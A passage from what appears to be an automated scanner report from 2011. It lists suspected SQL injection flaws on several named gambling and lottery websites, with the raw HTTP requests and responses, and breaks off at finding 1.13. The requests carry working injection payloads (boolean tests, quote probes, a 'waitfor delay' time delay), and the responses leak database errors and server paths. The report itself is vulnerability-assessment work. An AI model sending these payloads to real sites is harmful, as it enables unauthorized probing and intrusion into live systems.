1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://scratch.betsson.com
Path:	/en/Sports/World-Champions

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:33 GMT
Connection: close
Content-Length: 102686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView(
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:34 GMT
Connection: close
Content-Length: 102699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />



<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="To
...[SNIP]...

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/images/games_ENG.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /images'/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images''/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/images/games_ENG.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /images/games_ENG.swf' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:30 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9685

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images/games_ENG.swf'' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/resources/style.css

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources'/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:33 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources''/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/resources/style.css

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources/style.css' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:00 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources/style.css'' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:02 GMT; path=/
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.10. http://trk.primescratchcards.com/ [ac parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.primescratchcards.com
Path:	/

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ac parameter. The application took 21463 milliseconds to respond to the request, compared with 202 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?ac=51waitfor%20delay'0%3a0%3a20'--&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 531
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=LGFGLCIAIFPMDMCAJENJMCKD; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 51waitfor delay'0:0:20'-- ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Microsoft OLE DB Provid
...[SNIP]...

1.11. http://www.interwetten.org/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.interwetten.org
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6798

<html>
<head>
<title>Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&q='')'.</title>
<style>
body {font-family:"Verdana";font-
...[SNIP]...
</b>System.Data.OleDb.OleDbException: Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&q='')'.<br>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=daqivy3db3w1hk455t45bdvf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hom
...[SNIP]...

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/our-partners

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 45542616%20or%201%3d1--%20 and 45542616%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /our-partners?145542616%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Length: 32146
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

                       </td></tr>
                   </table>
               </td>

           </table>

       </td></tr>
   </table>


</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>

Request 2

GET /our-partners?145542616%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Length: 31988
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:36:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

                       </td></tr>
                   </table>
               </td>

           </table>

       </td></tr>
   </table>


</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>

1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/outbound/article/www.bet365.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14417416'%20or%201%3d1--%20 and 14417416'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d1--%20=1 HTTP/1.1
